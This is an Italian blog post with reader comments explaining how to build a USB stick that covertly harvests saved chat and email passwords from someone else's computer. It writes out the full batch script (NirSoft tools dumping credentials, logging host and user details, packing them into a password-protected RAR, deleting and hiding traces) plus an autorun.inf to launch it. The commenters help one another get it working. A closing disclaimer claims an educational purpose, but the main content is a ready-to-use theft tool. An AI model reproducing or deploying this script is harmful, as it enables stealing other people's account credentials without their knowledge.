La chiavetta Usb ruba password

Il sito web Nirsoft fornisce diversi programmi gratuiti per recuperare le password salvate nel computer che si sta usando nel caso in cui le si dimentichino. E’ possibile però usare questi programmi gratuiti per altri scopi, come rubare le password del computer che si sta utilizzando.
Se un malintenzionato ha accesso fisico al computer da cui rubare le password, ha a disposizione solo pochi secondi per compiere l’”operazione”. Da questa necessità, ecco l’idea di usare una chiavetta USB. Con questo articolo, voglio semplicemente farvi vedere come sia facile creare una chiavetta USB che, inserita nel computer che ci interessa, salva le password trovate all’interno della chiavetta stessa.
Così facendo, basta collegare la chiavetta al computer che ci interessa, fare un semplice click e dopo qualche secondo staccare la chiavetta ed allontanarci dal computer con le password. Per realizzare questa chiavetta USB speciale, prima di tutto, create una cartella sul vostro desktop con il nome di Chiavetta. Questa cartella conterrà tutti i file che andranno copiati nella chiavetta.
Collegatevi alla pagina del sito web di Nirsoft per scaricare i programmi per recuperare le password. Vi consiglio di scaricare solo i programmi che vi recuperano le password che vi interessano. Se avete intenzione, ad esempio, di recuperare solo le password dei programmi di chat e quelli delle e-mail, scaricate i programmi MessenPass e Mail PassView.
Dopo aver scaricato i pacchetti con i programmi per recuperare le password, estraeteli nella cartella Chiavetta. In questa cartella lasciate solo i programmi veri e propri: cancellate, in breve, gli altri file come il readme.txt o la guida di utilizzo del programma.
A questo punto, scaricate ed installate l’ultima versione di Winrar. Andate su questa pagina e fate click sulla voce WinRAR 3.60 (Graphic and command line). Dopo aver installato Winrar, andate su Start/Risorse del computer/C:/Programmi/WinRAR, copiate ed incollate il programma Rar.exe nella cartella del desktop Chiavetta.
Adesso aprite il Blocco Note, andando su Start/Tutti i programmi/Accessori/Blocco note, e scrivete la seguente riga per ogni programma che recupera le password che avete inserito nella cartella Chiavetta:
@nomedelprogramma.exe /sverhtml nomedelprogramma.html
Al termine del file scrivete, invece, le righe:
REM Scrittura del file di log
@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %USERNAME% >> log.txt
@echo USERDOMAIN = %USERDOMAIN% >> log.txt
@echo USERPROFILE = %USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Oggi e’ %DATE% e sono le %TIME% >> log.txt
REM Compressione
@rar.exe a -pPASSWORD backup_%random%.rar *.html log.txt > nul
REM Eliminazione e celamento dei file usati
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf
In breve, quando avvierete questo piccolo programmino, le password verranno recuperate dal computer e salvate in diversi file .HTML. A questo punto, questi file HTML vengono inseriti in un archivio .RAR protetto da password. La password dell’archivio deve essere specificata al posto della parola PASSWORD.
La password è case sensitive: fanno differenza, quindi, le lettere maiuscole e quelle minuscole. Alla fine i programmi utilizzati per recuperare le password vengono nascosti e le pagine HTML eliminate, poichè già inserite nell’archivio .RAR. Nel mio caso (programmi MessenPass e Mail PassView), ho scritto queste righe:
@mspass.exe /sverhtml mspass.html
@mailpv.exe /sverhtml mailpv.html
REM Scrittura del file di log
@echo COMPUTERNAME = %COMPUTERNAME% > log.txt
@echo USERNAME = %USERNAME% >> log.txt
@echo USERDOMAIN = %USERDOMAIN% >> log.txt
@echo USERPROFILE = %USERPROFILE% >> log.txt
@echo. >> log.txt
@echo Oggi e’ %DATE% e sono le %TIME% >> log.txt
REM Compressione
@rar.exe a -pPASSWORD backup_%random%.rar *.html log.txt > nul
REM Eliminazione e celamento dei file usati
@del *.html
@del log.txt
@attrib +h *.exe
@attrib +h autorun.inf
Alla fine, salvate il file con il nome lancia.bat: andate semplicemente su File/Salva file con nome… e, nella finestra che si apre, scrivete lancia.bat in Nome file e selezionate Tutti i file in Salva come. Il file deve essere salvato nella Chiavetta.
Dopo aver creato il file lancia.bat, create il file autorun.inf sempre con il Blocco note:
[autorun]
open=lancia.bat
action=Preleva password
A questo punto avete finito. Nella cartella troverete i seguenti file:
Contenuto chiavetta
Dovete semplicemente copiare tutti i file nella cartella principale della vostra chiavetta USB per concludere la sua creazione. Se volete fare delle prove, dopo aver copiato i file, estraete ed inserite la chiavetta. Verrà aperta la seguente finestra:
Chiavetta USB
Se selezionate la prima voce (Preleva password) e fate click sul tasto OK, le password del computer verranno salvate all’interno dell’archivio protetto .RAR. A questo punto, basta staccare la chiavetta ed andare in un computer sicuro con Winrar installato per leggere le password trovate.
[via Aranzulla]

P.s. Questo articolo non vuole essere una guida per malintenzionati, ma uno strumento per capire quanto il nostro Sistema sia vulnerabile dagli attacchi esterni ed eventualmente un aiuto per recuperare le proprie Password dimenticate!
La chiavetta Usb ruba password La chiavetta Usb ruba password Reviewed by Nitro81 on 12:18 Rating: 5

12 commenti:

  1. ci sono riuscito ma mi esce sempre "password encripted file" cosa vuol dire... di quale password parla?

    RispondiElimina
  2. guarda è spiegato chiaramente nell'articolo..se usi paro paro il codice indicato la password dell'archivio è: PASSWORD

    RispondiElimina
  3. L'autorun non funionera' mai in una chiavetta usb....
    SVEGLIA
    manca qualcosa per farlo funzionare...
    ma roba da matti....
    COSA SARA'?

    RispondiElimina
  4. ma io quando metto la usb nn me appare prleva pass ma tutta la cartella coi file
    :-l

    RispondiElimina
  5. allora fai partire manualmente il file lancia.bat!

    RispondiElimina
  6. la password si può modificare:
    sostituisci il codice PASSWORD
    metti il codice che vuoi utilizzare

    RispondiElimina
  7. grazie per la password

    RispondiElimina
  8. Ma.. viene fuori solo il nome del pc e basta.. e l'ora fine.. HELP ME? HELP?

    RispondiElimina
  9. Il sistema della "chiavetta scopri password" recupera le parole chiave solo se salvate nel pc e solo se vengono istallati i software specifici di recupero. Nell'articolo trovi i link

    RispondiElimina

I commenti sono moderati. Messaggi di spam non verranno pubblicati.

Immagini dei temi di enot-poloskun. Powered by Blogger.